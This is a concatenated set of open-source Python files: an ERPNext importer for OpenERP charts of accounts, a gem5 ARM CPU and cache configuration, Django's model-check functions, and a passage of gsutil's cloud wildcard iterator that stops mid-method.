indictranstech/tele-erpnext | erpnext/accounts/doctype/account/chart_of_accounts/import_from_openerp.py | 87 | 8747 | # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# License: GNU General Public License v3. See license.txt
"""
Import chart of accounts from OpenERP sources
"""
from __future__ import unicode_literals
import os, json
import ast
from xml.etree import ElementTree as ET
from frappe.utils.csvutils import read_csv_content
import frappe
path = "/Users/nabinhait/projects/odoo/addons"
accounts = {}
charts = {}
all_account_types = []
all_roots = {}
def go():
    """Walk every l10n_* OpenERP module and regenerate chart json files."""
    global accounts, charts
    default_account_types = get_default_account_types()
    # Collect the localisation module directories (l10n_<country>).
    country_dirs = []
    for basepath, folders, files in os.walk(path):
        basename = os.path.basename(basepath)
        if basename.startswith("l10n_"):
            country_dirs.append(basename)
    for country_dir in country_dirs:
        # Fresh maps per country module.
        accounts, charts = {}, {}
        country_path = os.path.join(path, country_dir)
        # The module manifest (__openerp__.py) lists the data files to scan.
        manifest = ast.literal_eval(open(os.path.join(country_path, "__openerp__.py")).read())
        data_files = manifest.get("data", []) + manifest.get("init_xml", []) + \
            manifest.get("update_xml", [])
        files_path = [os.path.join(country_path, d) for d in data_files]
        xml_roots = get_xml_roots(files_path)
        csv_content = get_csv_contents(files_path)
        prefix = country_dir if csv_content else None
        # NOTE(review): csv_content values are *lists* of csv contents while
        # get_account_types appears to expect a single content (header row
        # first) -- confirm which shape is intended.
        account_types = get_account_types(xml_roots.get("account.account.type", []),
            csv_content.get("account.account.type", []), prefix)
        account_types.update(default_account_types)
        if xml_roots:
            make_maps_for_xml(xml_roots, account_types, country_dir)
        if csv_content:
            make_maps_for_csv(csv_content, account_types, country_dir)
        make_account_trees()
        make_charts()
    create_all_roots_file()
def get_default_account_types():
    """Parse the core "account" module's type definitions and map them."""
    xml_file = os.path.join(path, "account", "data", "data_account_type.xml")
    roots = [ET.parse(xml_file).getroot()]
    return get_account_types(roots, None, prefix="account")
def get_xml_roots(files_path):
    """Parse the xml files among *files_path*; return model -> [roots]."""
    xml_roots = frappe._dict()
    for filepath in files_path:
        fname = os.path.basename(filepath)
        if fname.endswith(".xml"):
            tree = ET.parse(filepath)
            root = tree.getroot()
            for node in root[0].findall("record"):
                if node.get("model") in ["account.account.template",
                    "account.chart.template", "account.account.type"]:
                    xml_roots.setdefault(node.get("model"), []).append(root)
                    # NOTE(review): the break registers the root only under
                    # the *first* interesting model found in the file; a file
                    # mixing several models is indexed once -- confirm.
                    break
    return xml_roots
def get_csv_contents(files_path):
    """Read the OpenERP csv data files among *files_path*.

    Returns a dict mapping the record model name (e.g.
    "account.account.template") to a list of parsed csv contents, one
    entry per matching file.
    """
    csv_content = {}
    for filepath in files_path:
        fname = os.path.basename(filepath)
        for file_type in ["account.account.template", "account.account.type",
                "account.chart.template"]:
            if fname.startswith(file_type) and fname.endswith(".csv"):
                with open(filepath, "r") as csvfile:
                    try:
                        csv_content.setdefault(file_type, [])\
                            .append(read_csv_content(csvfile.read()))
                    # FIX: 'except Exception, e' was Python-2-only syntax
                    # and bound an unused name. Kept deliberately broad:
                    # some localisation csv files are malformed and are
                    # skipped rather than aborting the whole import.
                    except Exception:
                        continue
    return csv_content
def get_account_types(root_list, csv_content, prefix=None):
    """Extract account-type info keyed by record id.

    Args:
        root_list: parsed XML roots containing account.account.type records.
        csv_content: rows of an account.account.type csv (header row first),
            or None.
        prefix: optional module name prepended to record ids ("prefix.id").

    Returns:
        dict mapping record id -> {"account_type": <mapped type>}; the value
        dict is empty when the record's code had no mapping.
    """
    types = {}
    account_type_map = {
        'cash': 'Cash',
        'bank': 'Bank',
        'tr_cash': 'Cash',
        'tr_bank': 'Bank',
        'receivable': 'Receivable',
        'tr_receivable': 'Receivable',
        'account rec': 'Receivable',
        'payable': 'Payable',
        'tr_payable': 'Payable',
        'equity': 'Equity',
        'stocks': 'Stock',
        'stock': 'Stock',
        'tax': 'Tax',
        'tr_tax': 'Tax',
        'tax-out': 'Tax',
        'tax-in': 'Tax',
        'charges_personnel': 'Chargeable',
        'fixed asset': 'Fixed Asset',
        'cogs': 'Cost of Goods Sold',
    }
    for root in root_list:
        for node in root[0].findall("record"):
            if node.get("model") == "account.account.type":
                data = {}
                for field in node.findall("field"):
                    if field.get("name") == "code" and field.text.lower() != "none" \
                            and account_type_map.get(field.text):
                        data["account_type"] = account_type_map[field.text]
                node_id = prefix + "." + node.get("id") if prefix else node.get("id")
                types[node_id] = data
    if csv_content and csv_content[0][0] == "id":
        for row in csv_content[1:]:
            row_dict = dict(zip(csv_content[0], row))
            data = {}
            if row_dict.get("code") and account_type_map.get(row_dict["code"]):
                data["account_type"] = account_type_map[row_dict["code"]]
            # BUG FIX: the record id lives in the csv row (row_dict), not in
            # the freshly-built data dict -- the old check data.get("id")
            # was always false, so csv-defined types were silently dropped.
            if data and row_dict.get("id"):
                node_id = prefix + "." + row_dict["id"] if prefix else row_dict["id"]
                types[node_id] = data
    return types
def make_maps_for_xml(xml_roots, account_types, country_dir):
    """make maps for `charts` and `accounts` (module globals) from xml"""
    # iteritems: Python 2 codebase.
    for model, root_list in xml_roots.iteritems():
        for root in root_list:
            for node in root[0].findall("record"):
                # Account template records become entries in `accounts`.
                if node.get("model")=="account.account.template":
                    data = {}
                    for field in node.findall("field"):
                        if field.get("name")=="name":
                            data["name"] = field.text
                        if field.get("name")=="parent_id":
                            # parent may be given by ref or by eval expression
                            parent_id = field.get("ref") or field.get("eval")
                            data["parent_id"] = parent_id
                        if field.get("name")=="user_type":
                            value = field.get("ref")
                            if account_types.get(value, {}).get("account_type"):
                                data["account_type"] = account_types[value]["account_type"]
                                if data["account_type"] not in all_account_types:
                                    all_account_types.append(data["account_type"])
                    data["children"] = []
                    accounts[node.get("id")] = data
                # Chart template records become entries in `charts`.
                if node.get("model")=="account.chart.template":
                    data = {}
                    for field in node.findall("field"):
                        if field.get("name")=="name":
                            data["name"] = field.text
                        if field.get("name")=="account_root_id":
                            data["account_root_id"] = field.get("ref")
                    data["id"] = country_dir
                    charts.setdefault(node.get("id"), {}).update(data)
def make_maps_for_csv(csv_content, account_types, country_dir):
    """Fill the `accounts` and `charts` module globals from parsed csv files."""
    for content in csv_content.get("account.account.template", []):
        # content[0] is the header row; zip each data row against it.
        for row in content[1:]:
            data = dict(zip(content[0], row))
            account = {
                "name": data.get("name"),
                # column naming varies between files: "x:id" vs "x/id"
                "parent_id": data.get("parent_id:id") or data.get("parent_id/id"),
                "children": []
            }
            user_type = data.get("user_type/id") or data.get("user_type:id")
            if account_types.get(user_type, {}).get("account_type"):
                account["account_type"] = account_types[user_type]["account_type"]
                if account["account_type"] not in all_account_types:
                    all_account_types.append(account["account_type"])
            accounts[data.get("id")] = account
            # A parentless account tied to a chart template is that chart's root.
            if not account.get("parent_id") and data.get("chart_template_id:id"):
                chart_id = data.get("chart_template_id:id")
                charts.setdefault(chart_id, {}).update({"account_root_id": data.get("id")})
    for content in csv_content.get("account.chart.template", []):
        for row in content[1:]:
            if row:
                data = dict(zip(content[0], row))
                charts.setdefault(data.get("id"), {}).update({
                    "account_root_id": data.get("account_root_id:id") or \
                        data.get("account_root_id/id"),
                    "name": data.get("name"),
                    "id": country_dir
                })
def make_account_trees():
    """build tree hierarchy"""
    # Re-parent: each account is inserted into its parent's dict keyed by
    # its own name. NOTE: iterates keys() while mutating -- safe on Python 2
    # where keys() returns a list snapshot.
    for id in accounts.keys():
        account = accounts[id]
        if account.get("parent_id"):
            if accounts.get(account["parent_id"]):
                # accounts[account["parent_id"]]["children"].append(account)
                accounts[account["parent_id"]][account["name"]] = account
            del account["parent_id"]
            del account["name"]
    # remove empty children
    for id in accounts.keys():
        if "children" in accounts[id] and not accounts[id].get("children"):
            del accounts[id]["children"]
def make_charts():
    """write chart files in app/setup/doctype/company/charts"""
    for chart_id in charts:
        src = charts[chart_id]
        # Skip incomplete charts and charts whose root account was not found.
        if not src.get("name") or not src.get("account_root_id"):
            continue
        if not src["account_root_id"] in accounts:
            continue
        # src["id"] is the module dir name; [5:] strips the "l10n_" prefix
        # leaving the country code.
        filename = src["id"][5:] + "_" + chart_id
        print "building " + filename
        chart = {}
        chart["name"] = src["name"]
        chart["country_code"] = src["id"][5:]
        chart["tree"] = accounts[src["account_root_id"]]
        for key, val in chart["tree"].items():
            if key in ["name", "parent_id"]:
                chart["tree"].pop(key)
            if type(val) == dict:
                val["root_type"] = ""
        if chart:
            fpath = os.path.join("erpnext", "erpnext", "accounts", "doctype", "account",
                "chart_of_accounts", filename + ".json")
            # Only overwrite charts that are inactive/enabled-off or empty.
            with open(fpath, "r") as chartfile:
                old_content = chartfile.read()
            if not old_content or (json.loads(old_content).get("is_active", "No") == "No" \
                and json.loads(old_content).get("disabled", "No") == "No"):
                with open(fpath, "w") as chartfile:
                    chartfile.write(json.dumps(chart, indent=4, sort_keys=True))
            all_roots.setdefault(filename, chart["tree"].keys())
def create_all_roots_file():
    """Dump every chart's root account names to all_roots.txt."""
    with open('all_roots.txt', 'w') as out:
        for chart_name, root_names in sorted(all_roots.items()):
            out.write(chart_name)
            out.write('\n----------------------\n')
            for root_name in sorted(root_names):
                out.write(root_name.encode('utf-8'))
                out.write('\n')
            out.write('\n\n\n')
if __name__=="__main__":
go()
| agpl-3.0 |
utsav2601/cmpe295A | tools/arm_gem5/O3_ARM_v7a.py | 9 | 6472 | # Copyright (c) 2012 The Regents of The University of Michigan
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Ron Dreslinski
from m5.objects import *
# Simple ALU Instructions have a latency of 1
class O3_ARM_v7a_Simple_Int(FUDesc):
    # Two simple integer ALUs, single-cycle operation latency.
    opList = [ OpDesc(opClass='IntAlu', opLat=1) ]
    count = 2
# Complex ALU instructions have a variable latencies
class O3_ARM_v7a_Complex_Int(FUDesc):
    # One complex integer unit: pipelined multiply, unpipelined divide
    # (issueLat == opLat), and IPR access.
    opList = [ OpDesc(opClass='IntMult', opLat=3, issueLat=1),
               OpDesc(opClass='IntDiv', opLat=12, issueLat=12),
               OpDesc(opClass='IprAccess', opLat=3, issueLat=1) ]
    count = 1
# Floating point and SIMD instructions
class O3_ARM_v7a_FP(FUDesc):
    # Two FP/SIMD pipes covering NEON integer/float ops and scalar FP;
    # divide and sqrt are unpipelined (issueLat == opLat).
    opList = [ OpDesc(opClass='SimdAdd', opLat=4),
               OpDesc(opClass='SimdAddAcc', opLat=4),
               OpDesc(opClass='SimdAlu', opLat=4),
               OpDesc(opClass='SimdCmp', opLat=4),
               OpDesc(opClass='SimdCvt', opLat=3),
               OpDesc(opClass='SimdMisc', opLat=3),
               OpDesc(opClass='SimdMult', opLat=5),
               OpDesc(opClass='SimdMultAcc', opLat=5),
               OpDesc(opClass='SimdShift', opLat=3),
               OpDesc(opClass='SimdShiftAcc', opLat=3),
               OpDesc(opClass='SimdSqrt', opLat=9),
               OpDesc(opClass='SimdFloatAdd', opLat=5),
               OpDesc(opClass='SimdFloatAlu', opLat=5),
               OpDesc(opClass='SimdFloatCmp', opLat=3),
               OpDesc(opClass='SimdFloatCvt', opLat=3),
               OpDesc(opClass='SimdFloatDiv', opLat=3),
               OpDesc(opClass='SimdFloatMisc', opLat=3),
               OpDesc(opClass='SimdFloatMult', opLat=3),
               OpDesc(opClass='SimdFloatMultAcc', opLat=1),
               OpDesc(opClass='SimdFloatSqrt', opLat=9),
               OpDesc(opClass='FloatAdd', opLat=5),
               OpDesc(opClass='FloatCmp', opLat=5),
               OpDesc(opClass='FloatCvt', opLat=5),
               OpDesc(opClass='FloatDiv', opLat=9, issueLat=9),
               OpDesc(opClass='FloatSqrt', opLat=33, issueLat=33),
               OpDesc(opClass='FloatMult', opLat=4) ]
    count = 2
# Load/Store Units
class O3_ARM_v7a_Load(FUDesc):
    # Single load unit, 2-cycle latency.
    opList = [ OpDesc(opClass='MemRead', opLat=2) ]
    count = 1
class O3_ARM_v7a_Store(FUDesc):
    # Single store unit, 2-cycle latency.
    opList = [ OpDesc(opClass='MemWrite', opLat=2) ]
    count = 1
# Functional Units for this CPU
class O3_ARM_v7a_FUP(FUPool):
    # Functional-unit pool combining all the units defined above.
    FUList = [O3_ARM_v7a_Simple_Int(), O3_ARM_v7a_Complex_Int(),
              O3_ARM_v7a_Load(), O3_ARM_v7a_Store(), O3_ARM_v7a_FP()]
class O3_ARM_v7a_3(DerivO3CPU):
    # --- branch prediction: tournament of local + global predictors ---
    predType = "tournament"
    localPredictorSize = 64
    localCtrBits = 2
    localHistoryTableSize = 64
    localHistoryBits = 6
    globalPredictorSize = 8192
    globalCtrBits = 2
    globalHistoryBits = 13
    choicePredictorSize = 8192
    choiceCtrBits = 2
    BTBEntries = 2048
    BTBTagSize = 18
    RASSize = 16
    instShiftAmt = 2
    # --- load/store queue and memory-dependence prediction ---
    LQEntries = 16
    SQEntries = 16
    LSQDepCheckShift = 0
    LFSTSize = 1024
    SSITSize = 1024
    # --- inter-stage communication delays (in cycles) ---
    decodeToFetchDelay = 1
    renameToFetchDelay = 1
    iewToFetchDelay = 1
    commitToFetchDelay = 1
    renameToDecodeDelay = 1
    iewToDecodeDelay = 1
    commitToDecodeDelay = 1
    iewToRenameDelay = 1
    commitToRenameDelay = 1
    commitToIEWDelay = 1
    # --- front-end widths and delays ---
    fetchWidth = 3
    fetchToDecodeDelay = 3
    decodeWidth = 3
    decodeToRenameDelay = 2
    renameWidth = 3
    renameToIEWDelay = 1
    issueToExecuteDelay = 1
    # --- issue/execute/writeback widths ---
    dispatchWidth = 6
    issueWidth = 8
    wbWidth = 8
    wbDepth = 1
    fuPool = O3_ARM_v7a_FUP()
    # --- commit ---
    iewToCommitDelay = 1
    renameToROBDelay = 1
    commitWidth = 8
    squashWidth = 8
    trapLatency = 13
    backComSize = 5
    forwardComSize = 5
    # --- physical register file and instruction queues ---
    numPhysIntRegs = 128
    numPhysFloatRegs = 128
    numIQEntries = 32
    numROBEntries = 40

    defer_registration = False
# Instruction Cache
# All latencys assume a 1GHz clock rate, with a faster clock they would be faster
class O3_ARM_v7a_ICache(BaseCache):
    # 32kB 2-way L1 instruction cache.
    response_latency = '1'
    block_size = 64
    mshrs = 2
    tgts_per_mshr = 8
    size = '32kB'
    assoc = 2
    is_top_level = 'true'
# Data Cache
# All latencys assume a 1GHz clock rate, with a faster clock they would be faster
class O3_ARM_v7a_DCache(BaseCache):
    # 32kB 2-way L1 data cache.
    response_latency = '2'
    block_size = 64
    mshrs = 6
    tgts_per_mshr = 8
    size = '32kB'
    assoc = 2
    write_buffers = 16
    is_top_level = 'true'
# TLB Cache
# Use a cache as a L2 TLB
class O3_ARM_v7aWalkCache(BaseCache):
    # Small cache used by the page-table walker as an L2 TLB.
    response_latency = '4'
    block_size = 64
    mshrs = 6
    tgts_per_mshr = 8
    size = '1kB'
    assoc = 8
    write_buffers = 16
    is_top_level = 'true'
# L2 Cache
# All latencys assume a 1GHz clock rate, with a faster clock they would be faster
class O3_ARM_v7aL2(BaseCache):
    # 1MB 16-way unified L2 with a simple stride prefetcher.
    response_latency = '12'
    block_size = 64
    mshrs = 16
    tgts_per_mshr = 8
    size = '1MB'
    assoc = 16
    write_buffers = 8
    prefetch_on_access = 'true'
    # Simple stride prefetcher
    prefetcher = StridePrefetcher(degree=8, latency=1)
| mit |
zedr/django | django/core/checks/model_checks.py | 6 | 1857 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from itertools import chain
import types
from django.apps import apps
from . import Error, register
@register('models')
def check_all_models(app_configs=None, **kwargs):
    """Run every installed model's checks, optionally restricted to app_configs."""
    all_errors = []
    for model in apps.get_models():
        if app_configs is not None and model._meta.app_config not in app_configs:
            continue
        all_errors.extend(model.check(**kwargs))
    return all_errors
@register('models', 'signals')
def check_model_signals(app_configs=None, **kwargs):
    """Ensure lazily referenced model signals senders are installed."""
    # NOTE(review): app_configs is accepted but unused here -- signal
    # references are checked globally; confirm that is intentional.
    from django.db import models
    errors = []
    for name in dir(models.signals):
        obj = getattr(models.signals, name)
        if isinstance(obj, models.signals.ModelSignal):
            # Any reference left unresolved means the sender model was
            # never installed.
            for reference, receivers in obj.unresolved_references.items():
                for receiver, _, _ in receivers:
                    # The receiver is either a function or an instance of class
                    # defining a `__call__` method.
                    if isinstance(receiver, types.FunctionType):
                        description = "The `%s` function" % receiver.__name__
                    else:
                        description = "An instance of the `%s` class" % receiver.__class__.__name__
                    errors.append(
                        Error(
                            "%s was connected to the `%s` signal "
                            "with a lazy reference to the '%s' sender, "
                            "which has not been installed." % (
                                description, name, '.'.join(reference)
                            ),
                            obj=receiver.__module__,
                            hint=None,
                            id='E014'
                        )
                    )
    return errors
| bsd-3-clause |
liaorubei/depot_tools | third_party/gsutil/gslib/wildcard_iterator.py | 50 | 20828 | # Copyright 2010 Google Inc. All Rights Reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""Implementation of wildcarding over StorageUris.
StorageUri is an abstraction that Google introduced in the boto library,
for representing storage provider-independent bucket and object names with
a shorthand URI-like syntax (see boto/boto/storage_uri.py) The current
class provides wildcarding support for StorageUri objects (including both
bucket and file system objects), allowing one to express collections of
objects with syntax like the following:
gs://mybucket/images/*.png
file:///tmp/???abc???
We provide wildcarding support as part of gsutil rather than as part
of boto because wildcarding is really part of shell command-like
functionality.
A comment about wildcard semantics: We support both single path component
wildcards (e.g., using '*') and recursive wildcards (using '**'), for both
file and cloud URIs. For example,
gs://bucket/doc/*/*.html
would enumerate HTML files one directory down from gs://bucket/doc, while
gs://bucket/**/*.html
would enumerate HTML files in all objects contained in the bucket.
Note also that if you use file system wildcards it's likely your shell
interprets the wildcarding before passing the command to gsutil. For example:
% gsutil cp /opt/eclipse/*/*.html gs://bucket/eclipse
would likely be expanded by the shell into the following before running gsutil:
% gsutil cp /opt/eclipse/RUNNING.html gs://bucket/eclipse
Note also that most shells don't support '**' wildcarding (I think only
zsh does). If you want to use '**' wildcarding with such a shell you can
single quote each wildcarded string, so it gets passed uninterpreted by the
shell to gsutil (at which point gsutil will perform the wildcarding expansion):
% gsutil cp '/opt/eclipse/**/*.html' gs://bucket/eclipse
"""
import boto
import fnmatch
import glob
import os
import re
import sys
import urllib
from boto.s3.prefix import Prefix
from boto.storage_uri import BucketStorageUri
from bucket_listing_ref import BucketListingRef
# Regex to determine if a string contains any wildcards.
# Raw string: the original '[*?\[\]]' relied on invalid escape sequences
# ('\[' / '\]'), which newer Python versions warn about.
WILDCARD_REGEX = re.compile(r'[*?\[\]]')

# Operation identifiers passed to ProjectIdHandler.FillInProjectHeaderIfNeeded
# so it knows which kind of wildcard iteration is asking for the header.
WILDCARD_OBJECT_ITERATOR = 'wildcard_object_iterator'
WILDCARD_BUCKET_ITERATOR = 'wildcard_bucket_iterator'
class WildcardIterator(object):
  """Abstract base for iterating over wildcarded StorageUris.

  Subclasses implement iteration over StorageUris that contain wildcards.

  Do not instantiate this class directly; call the wildcard_iterator()
  factory function, which chooses the right implementation for the
  given StorageUri.
  """

  def __repr__(self):
    """Return a debug representation naming the wrapped wildcard URI."""
    return 'WildcardIterator({0})'.format(self.wildcard_uri)
class CloudWildcardIterator(WildcardIterator):
  """WildcardIterator subclass for buckets and objects.

  Iterates over BucketListingRef matching the StorageUri wildcard. It's
  much more efficient to request the Key from the BucketListingRef (via
  GetKey()) than to request the StorageUri and then call uri.get_key()
  to retrieve the key, for cases where you want to get metadata that's
  available in the Bucket (for example to get the name and size of
  each object), because that information is available in the bucket GET
  results. If you were to iterate over URIs for such cases and then get
  the name and size info from each resulting StorageUri, it would cause
  an additional object GET request for each of the result URIs.
  """

  def __init__(self, wildcard_uri, proj_id_handler,
               bucket_storage_uri_class=BucketStorageUri, all_versions=False,
               headers=None, debug=0):
    """
    Instantiates an iterator over BucketListingRef matching given wildcard URI.

    Args:
      wildcard_uri: StorageUri that contains the wildcard to iterate.
      proj_id_handler: ProjectIdHandler to use for current command.
      bucket_storage_uri_class: BucketStorageUri interface.
          Settable for testing/mocking.
      all_versions: If True, bucket listings include all object versions
          (passed through to list_bucket()).
      headers: Dictionary containing optional HTTP headers to pass to boto.
      debug: Debug level to pass in to boto connection (range 0..3).
    """
    self.wildcard_uri = wildcard_uri
    # Make a copy of the headers so any updates we make during wildcard
    # expansion aren't left in the input params (specifically, so we don't
    # include the x-goog-project-id header needed by a subset of cases, in
    # the data returned to caller, which could then be used in other cases
    # where that header must not be passed).
    if headers is None:
      self.headers = {}
    else:
      self.headers = headers.copy()
    self.proj_id_handler = proj_id_handler
    self.bucket_storage_uri_class = bucket_storage_uri_class
    self.all_versions = all_versions
    self.debug = debug

  def __iter__(self):
    """Python iterator that gets called when iterating over cloud wildcard.

    Yields:
      BucketListingRef, or empty iterator if no matches.
    """
    # First handle bucket wildcarding, if any.
    if ContainsWildcard(self.wildcard_uri.bucket_name):
      regex = fnmatch.translate(self.wildcard_uri.bucket_name)
      bucket_uris = []
      prog = re.compile(regex)
      self.proj_id_handler.FillInProjectHeaderIfNeeded(WILDCARD_BUCKET_ITERATOR,
                                                       self.wildcard_uri,
                                                       self.headers)
      for b in self.wildcard_uri.get_all_buckets(headers=self.headers):
        if prog.match(b.name):
          # Use str(b.name) because get_all_buckets() returns Unicode
          # string, which when used to construct x-goog-copy-src metadata
          # requests for object-to-object copies causes pathname '/' chars
          # to be entity-encoded (bucket%2Fdir instead of bucket/dir),
          # which causes the request to fail.
          uri_str = '%s://%s' % (self.wildcard_uri.scheme,
                                 urllib.quote_plus(str(b.name)))
          bucket_uris.append(
              boto.storage_uri(
                  uri_str, debug=self.debug,
                  bucket_storage_uri_class=self.bucket_storage_uri_class,
                  suppress_consec_slashes=False))
    else:
      bucket_uris = [self.wildcard_uri.clone_replace_name('')]

    # Now iterate over bucket(s), and handle object wildcarding, if any.
    self.proj_id_handler.FillInProjectHeaderIfNeeded(WILDCARD_OBJECT_ITERATOR,
                                                     self.wildcard_uri,
                                                     self.headers)
    for bucket_uri in bucket_uris:
      if self.wildcard_uri.names_bucket():
        # Bucket-only URI.
        yield BucketListingRef(bucket_uri, key=None, prefix=None,
                               headers=self.headers)
      else:
        # URI contains an object name. If there's no wildcard just yield
        # the needed URI.
        if not ContainsWildcard(self.wildcard_uri.object_name):
          uri_to_yield = bucket_uri.clone_replace_name(
              self.wildcard_uri.object_name)
          yield BucketListingRef(uri_to_yield, key=None, prefix=None,
                                 headers=self.headers)
        else:
          # URI contains a wildcard. Expand iteratively by building
          # prefix/delimiter bucket listing request, filtering the results per
          # the current level's wildcard, and continuing with the next component
          # of the wildcard. See _BuildBucketFilterStrings() documentation
          # for details.
          #
          # Initialize the iteration with bucket name from bucket_uri but
          # object name from self.wildcard_uri. This is needed to handle cases
          # where both the bucket and object names contain wildcards.
          uris_needing_expansion = [
              bucket_uri.clone_replace_name(self.wildcard_uri.object_name)]
          while uris_needing_expansion:
            uri = uris_needing_expansion.pop(0)
            (prefix, delimiter, prefix_wildcard, suffix_wildcard) = (
                self._BuildBucketFilterStrings(uri.object_name))
            prog = re.compile(fnmatch.translate(prefix_wildcard))
            # List bucket for objects matching prefix up to delimiter.
            for key in bucket_uri.list_bucket(prefix=prefix,
                                              delimiter=delimiter,
                                              headers=self.headers,
                                              all_versions=self.all_versions):
              # Check that the prefix regex matches rstripped key.name (to
              # correspond with the rstripped prefix_wildcard from
              # _BuildBucketFilterStrings()).
              if prog.match(key.name.rstrip('/')):
                if suffix_wildcard and key.name.rstrip('/') != suffix_wildcard:
                  if isinstance(key, Prefix):
                    # There's more wildcard left to expand.
                    uris_needing_expansion.append(
                        uri.clone_replace_name(key.name.rstrip('/') + '/'
                                               + suffix_wildcard))
                else:
                  # Done expanding.
                  expanded_uri = uri.clone_replace_key(key)
                  if isinstance(key, Prefix):
                    yield BucketListingRef(expanded_uri, key=None, prefix=key,
                                           headers=self.headers)
                  else:
                    if self.all_versions:
                      yield BucketListingRef(expanded_uri, key=key, prefix=None,
                                             headers=self.headers)
                    else:
                      # Yield BLR wrapping version-less URI.
                      yield BucketListingRef(expanded_uri.clone_replace_name(
                          expanded_uri.object_name), key=key, prefix=None,
                          headers=self.headers)

  def _BuildBucketFilterStrings(self, wildcard):
    """
    Builds strings needed for querying a bucket and filtering results to
    implement wildcard object name matching.

    Args:
      wildcard: The wildcard string to match to objects.

    Returns:
      (prefix, delimiter, prefix_wildcard, suffix_wildcard)
      where:
        prefix is the prefix to be sent in bucket GET request.
        delimiter is the delimiter to be sent in bucket GET request.
        prefix_wildcard is the wildcard to be used to filter bucket GET results.
        suffix_wildcard is wildcard to be appended to filtered bucket GET
          results for next wildcard expansion iteration.
      For example, given the wildcard gs://bucket/abc/d*e/f*.txt we
      would build prefix= abc/d, delimiter=/, prefix_wildcard=d*e, and
      suffix_wildcard=f*.txt. Using this prefix and delimiter for a bucket
      listing request will then produce a listing result set that can be
      filtered using this prefix_wildcard; and we'd use this suffix_wildcard
      to feed into the next call(s) to _BuildBucketFilterStrings(), for the
      next iteration of listing/filtering.
    """
    # Generate a request prefix if the object name part of the wildcard starts
    # with a non-wildcard string (e.g., that's true for 'gs://bucket/abc*xyz').
    match = WILDCARD_REGEX.search(wildcard)
    if not match:
      # Input "wildcard" has no wildcard chars, so just return tuple that will
      # cause a bucket listing to match the given input wildcard. Example: if
      # previous iteration yielded gs://bucket/dir/ with suffix_wildcard abc,
      # the next iteration will call _BuildBucketFilterStrings() with
      # gs://bucket/dir/abc, and we will return prefix ='dir/abc',
      # delimiter='/', prefix_wildcard='dir/abc', and suffix_wildcard=''.
      prefix = wildcard
      delimiter = '/'
      prefix_wildcard = wildcard
      suffix_wildcard = ''
    else:
      if match.start() > 0:
        # Wildcard does not occur at beginning of object name, so construct a
        # prefix string to send to server.
        prefix = wildcard[:match.start()]
        wildcard_part = wildcard[match.start():]
      else:
        prefix = None
        wildcard_part = wildcard
      end = wildcard_part.find('/')
      if end != -1:
        wildcard_part = wildcard_part[:end+1]
      # Remove trailing '/' so we will match gs://bucket/abc* as well as
      # gs://bucket/abc*/ with the same wildcard regex.
      prefix_wildcard = ((prefix or '') + wildcard_part).rstrip('/')
      suffix_wildcard = wildcard[match.end():]
      end = suffix_wildcard.find('/')
      if end == -1:
        suffix_wildcard = ''
      else:
        suffix_wildcard = suffix_wildcard[end+1:]
      # To implement recursive (**) wildcarding, if prefix_wildcard
      # suffix_wildcard starts with '**' don't send a delimiter, and combine
      # suffix_wildcard at end of prefix_wildcard.
      if prefix_wildcard.find('**') != -1:
        delimiter = None
        prefix_wildcard = prefix_wildcard + suffix_wildcard
        suffix_wildcard = ''
      else:
        delimiter = '/'
        delim_pos = suffix_wildcard.find(delimiter)
    # The following debug output is useful for tracing how the algorithm
    # walks through a multi-part wildcard like gs://bucket/abc/d*e/f*.txt
    if self.debug > 1:
      sys.stderr.write(
          'DEBUG: wildcard=%s, prefix=%s, delimiter=%s, '
          'prefix_wildcard=%s, suffix_wildcard=%s\n' %
          (wildcard, prefix, delimiter, prefix_wildcard, suffix_wildcard))
    return (prefix, delimiter, prefix_wildcard, suffix_wildcard)

  def IterKeys(self):
    """
    Convenience iterator that runs underlying iterator and returns Key for each
    iteration.

    Yields:
      Subclass of boto.s3.key.Key, or empty iterator if no matches.

    Note: refs without a Key (e.g. those produced for bucket-only URIs or
    prefixes) are silently skipped, not raised on.
    """
    for bucket_listing_ref in iter(self):
      if bucket_listing_ref.HasKey():
